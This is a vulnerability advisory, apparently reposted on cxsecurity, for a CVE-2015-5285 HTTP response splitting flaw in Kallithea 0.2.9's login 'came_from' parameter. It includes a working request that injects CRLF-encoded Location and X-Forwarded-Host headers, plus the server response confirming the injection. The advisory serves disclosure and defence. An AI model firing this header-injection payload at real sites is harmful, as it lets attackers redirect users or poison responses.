Kallithea 0.2.9 HTTP Response Splitting

2015.10.08
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability Vendor: Kallithea Product web page: https://www.kallithea-scm.org Version affected: 0.2.9 and 0.2.2 Summary: Kallithea, a member project of Software Freedom Conservancy, is a GPLv3'd, Free Software source code management system that supports two leading version control systems, Mercurial and Git, and has a web interface that is easy to use for users and admins. Desc: Kallithea suffers from a HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET 'came_from' parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control. Tested on: Kali Python Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5267 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php Vendor: https://kallithea-scm.org/news/release-0.3.html Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html CVE ID: 2015-5285 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285 21.09.2015 -- GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1 Host: 192.168.0.28:8080 Content-Length: 0 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.0.28:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438 ### HTTP/1.1 302 Found Cache-Control: no-cache Content-Length: 411 Content-Type: text/html; charset=UTF-8 Date: Mon, 21 Sep 2015 13:58:05 GMT Location: http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk Pragma: no-cache Server: waitress <html> <head> <title>302 Found</title> </head> <body> <h1>302 Found</h1> The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk</a>; you should be redirected automatically. </body> </html>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top